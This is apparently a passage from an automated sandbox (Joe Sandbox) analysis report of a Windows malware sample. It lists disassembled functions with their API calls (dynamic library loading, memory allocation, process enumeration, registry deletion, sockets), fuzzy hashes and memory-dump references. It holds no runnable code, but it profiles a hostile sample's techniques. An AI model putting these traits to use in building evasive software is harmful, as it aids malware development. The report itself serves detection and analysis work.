                                                                                                          • Opcode Fuzzy Hash: 504fe457eab240a6ea482b5f6faa308ec7e8b7b1342dd7a15c3c171c8bb0f15d
                                                                                                          • Instruction Fuzzy Hash: 96E06D702003518FD320AF3AF8097027BE0AF04308F04995EE48AE7341DBB4E508CB91
                                                                                                          Function 00EBC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E8027A,?), ref: 00EBC6E7
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EBC6F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                          • API String ID: 2574300362-1816364905
                                                                                                          • Opcode ID: 7c26f7d917dff757982230e5f1924a0acb19ab0a520c84bea0d22583cdb3d463
                                                                                                          • Instruction ID: 375795d14b58f1b11b8a924fed01e465b84d504ef4b518be2950250fe2337a55
                                                                                                          • Opcode Fuzzy Hash: 7c26f7d917dff757982230e5f1924a0acb19ab0a520c84bea0d22583cdb3d463
                                                                                                          • Instruction Fuzzy Hash: 67E08C392153238FD7204B36EC49B9676D4EB04309F64A42BE885F2310DB70C8408B10
                                                                                                          Function 00E54BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E54AF7,?), ref: 00E54BB8
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E54BCA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 2574300362-1355242751
                                                                                                          • Opcode ID: 8ce1126e4cfcae2b6fb44f72eb3bf59d6d898bc1eeaaaf73bfcd4bb72ebc020a
                                                                                                          • Instruction ID: 8e5b54cadb38c8137bb119180bc859fe0416e42bf438239235a603c1656024c0
                                                                                                          • Opcode Fuzzy Hash: 8ce1126e4cfcae2b6fb44f72eb3bf59d6d898bc1eeaaaf73bfcd4bb72ebc020a
                                                                                                          • Instruction Fuzzy Hash: 00D012715117138FD7205F31EC0874676D5EF04355F15AD6AD8D5F2594DB70D4C4C610
                                                                                                          Function 00E54B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E54B44,?,00E549D4,?,?,00E527AF,?,00000001), ref: 00E54B85
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E54B97
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 2574300362-3689287502
                                                                                                          • Opcode ID: ce1ec7eebcd1855219e65d96041c4d7a56019e83a463dff7e1da09768d4b1c66
                                                                                                          • Instruction ID: e3212763d6f4f55b6aed40537bd0fb32009793ab2f226d24b8bd5b73843fbb93
                                                                                                          • Opcode Fuzzy Hash: ce1ec7eebcd1855219e65d96041c4d7a56019e83a463dff7e1da09768d4b1c66
                                                                                                          • Instruction Fuzzy Hash: CDD017B15117128FD7209F32EC18B0A77E4EF0435AF19AC2AD8D6F2690E770E8C4CA10
                                                                                                          Function 00EC1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00EC1696), ref: 00EC1455
                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EC1467
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                          • Opcode ID: 727e7be782f415391c0e4bcd03c79ebf56296486b174d46044612ee3116d7611
                                                                                                          • Instruction ID: 3042589396ebee69257a07d8173efeb910f76e92df1f32bfd096baaf81a2e945
                                                                                                          • Opcode Fuzzy Hash: 727e7be782f415391c0e4bcd03c79ebf56296486b174d46044612ee3116d7611
                                                                                                          • Instruction Fuzzy Hash: 87D017305527178FE7209F76EA08B1676E4EF0639AF25D86E94E6F2160EB70D8C4CA50
                                                                                                          Function 00E555F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E55E3D), ref: 00E555FE
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E55610
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                          • API String ID: 2574300362-192647395
                                                                                                          • Opcode ID: 3ad91f5ad31d4cf37119f6d3e7117f7d4f6b9de0081d934ca332b580b35662a5
                                                                                                          • Instruction ID: dfc1f34f7eadc1f00c5b614ca4f9318b023f6aa882b70e72bcb58ea30fcd243a
                                                                                                          • Opcode Fuzzy Hash: 3ad91f5ad31d4cf37119f6d3e7117f7d4f6b9de0081d934ca332b580b35662a5
                                                                                                          • Instruction Fuzzy Hash: FFD012755117128FD7205F31E81871676D4EF44356F19AC2BD895F2251D7B0C485C650
                                                                                                          Function 00EB97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EB93DE,?,00ED0980), ref: 00EB97D8
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EB97EA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                          • API String ID: 2574300362-199464113
                                                                                                          • Opcode ID: 84f17088396ef11e3330a9ac67319101ab61070f4df4447f5bbbfccc2f31ce6b
                                                                                                          • Instruction ID: de33da4afbe9b79d57b0bb10716c30abe4f64b57b9ed7ff94ecebdb8a3e951ee
                                                                                                          • Opcode Fuzzy Hash: 84f17088396ef11e3330a9ac67319101ab61070f4df4447f5bbbfccc2f31ce6b
                                                                                                          • Instruction Fuzzy Hash: 4ED0E2705217238FD7209F32E88879AB6E4EF48395F19A82B95D6F2250EB70C8808A11
                                                                                                          Function 00EBE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00EBE7A7
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00EBE7EA
                                                                                                            • Part of subcall function 00EBDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EBDEAE
                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EBE9EA
                                                                                                          • _memmove.LIBCMT ref: 00EBE9FD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3659485706-0
                                                                                                          • Opcode ID: cc89a2753a1646cb4d9acd9217221076d881d89c0984106fa1977fa70354a526
                                                                                                          • Instruction ID: 22b832f88a3ddfe4dcc884170f9f94ec85d098aed886d0e5e8299e4427b7b9e9
                                                                                                          • Opcode Fuzzy Hash: cc89a2753a1646cb4d9acd9217221076d881d89c0984106fa1977fa70354a526
                                                                                                          • Instruction Fuzzy Hash: C7C16B71A083119FC714DF24C480AABBBE4FF89718F14996EF899AB351D731E945CB82
                                                                                                          Function 00EB877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EB87AD
                                                                                                          • CoUninitialize.OLE32 ref: 00EB87B8
                                                                                                            • Part of subcall function 00ECDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00EB8A0E,?,00000000), ref: 00ECDF71
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB87C3
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB8A94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 780911581-0
                                                                                                          • Opcode ID: a6bce5d48924c95ad5913a1dbf3636df3b45c0fa90327c710be671db148c8095
                                                                                                          • Instruction ID: 918b758c6e5c666562509b8b50d33bd872070f8b66c4f836f39c56185ba6ea00
                                                                                                          • Opcode Fuzzy Hash: a6bce5d48924c95ad5913a1dbf3636df3b45c0fa90327c710be671db148c8095
                                                                                                          • Instruction Fuzzy Hash: D1A16A75704B019FCB10EF54D581B6AB7E8BF88314F549849F999AB3A2CB30ED04CB92
                                                                                                          Function 00E9814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ED3C4C,?), ref: 00E98308
                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ED3C4C,?), ref: 00E98320
                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00ED0988,000000FF,?,00000000,00000800,00000000,?,00ED3C4C,?), ref: 00E98345
                                                                                                          • _memcmp.LIBCMT ref: 00E98366
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 314563124-0
                                                                                                          • Opcode ID: e0f95aa9230d5692667c7cf581a94bc4ab2d0019c86a53e41d0a6c4a23108004
                                                                                                          • Instruction ID: 6df3ae648e7cd150e2a61a82750624e9e74eba3b2d455515f9cb2fa0d6782921
                                                                                                          • Opcode Fuzzy Hash: e0f95aa9230d5692667c7cf581a94bc4ab2d0019c86a53e41d0a6c4a23108004
                                                                                                          • Instruction Fuzzy Hash: C0810775A00109EFCF04DF94C984EEEB7B9EF89315F244599E506BB260DB71AE06CB60
                                                                                                          Function 00E9749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                          • String ID:
                                                                                                          • API String ID: 2808897238-0
                                                                                                          • Opcode ID: 5f9a117c3887417ec703b03946732ea513104ae6c1afb9ec44bbe9b0ddc2b0a7
                                                                                                          • Instruction ID: 42dbb5a48cff266898ffaba00000fa2a8fd592fd53e58e35ad4f6653183c4ceb
                                                                                                          • Opcode Fuzzy Hash: 5f9a117c3887417ec703b03946732ea513104ae6c1afb9ec44bbe9b0ddc2b0a7
                                                                                                          • Instruction Fuzzy Hash: 0F51C6306287019BCF209F799895B6EB3E4AF45314F24B81FE5D6F72A2EA3098488705
                                                                                                          Function 00EBF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00EBF526
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00EBF534
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00EBF5F4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EBF603
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2576544623-0
                                                                                                          • Opcode ID: 2a9c18a8ab7447c1f22831b076a1c73f8dd1255888fe9671ab9df0649e10de09
                                                                                                          • Instruction ID: 111e23407fa3404aa85ac98da404a2ed3f58f238633ad813c21bb1ab4f4a6a5b
                                                                                                          • Opcode Fuzzy Hash: 2a9c18a8ab7447c1f22831b076a1c73f8dd1255888fe9671ab9df0649e10de09
                                                                                                          • Instruction Fuzzy Hash: 0B517FB15043119FD310EF24EC46FABB7E8EF94700F50592DF995A72A1EB70A908CB92
                                                                                                          Function 00E6492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2782032738-0
                                                                                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                          • Instruction ID: 885f6ce85d64bc6c456ffe6d2e89c5a1edce89b0c937d0642f96676b17323cab
                                                                                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                          • Instruction Fuzzy Hash: D241EAB17C0706ABDF18DEA9E8905AF7BA5AF803E4B24A13DE455E76C0E770DD408744
                                                                                                          Function 00E9A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E9A68A
                                                                                                          • __itow.LIBCMT ref: 00E9A6BB
                                                                                                            • Part of subcall function 00E9A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E9A976
                                                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E9A724
                                                                                                          • __itow.LIBCMT ref: 00E9A77B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3379773720-0
                                                                                                          • Opcode ID: 991d79a6e04b5e45ab929a759a8ad72e71bd3c64a418f3bec172f159d317aa35
                                                                                                          • Instruction ID: 5c3b5d57105a064f48f826b76acd726c884c791239a61323ee66c574bfbd65cf
                                                                                                          • Opcode Fuzzy Hash: 991d79a6e04b5e45ab929a759a8ad72e71bd3c64a418f3bec172f159d317aa35
                                                                                                          • Instruction Fuzzy Hash: 20419374A00208ABDF10EF54D846BEE7BF9EF44751F08146AFD05B3281DB709948CAA2
                                                                                                          Function 00EB7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00EB70BC
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB70CC
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EB7130
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB713C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2214342067-0
                                                                                                          • Opcode ID: a7b69afe92d2d2ec5469c4ee5d93fcdaf7a9908d19283aced6ab14ecc267e5cb
                                                                                                          • Instruction ID: dfa22dbc6ca32a320ad6cd67e27406eadee6258b0cd2c315068f7a5729198966
                                                                                                          • Opcode Fuzzy Hash: a7b69afe92d2d2ec5469c4ee5d93fcdaf7a9908d19283aced6ab14ecc267e5cb
                                                                                                          • Instruction Fuzzy Hash: 774182B57402006FEB24AF24EC86F6A77E4DB44B14F049459FA59BB3D2DBB09D008B91
                                                                                                          Function 00EB6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00ED0980), ref: 00EB6B92
                                                                                                          • _strlen.LIBCMT ref: 00EB6BC4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
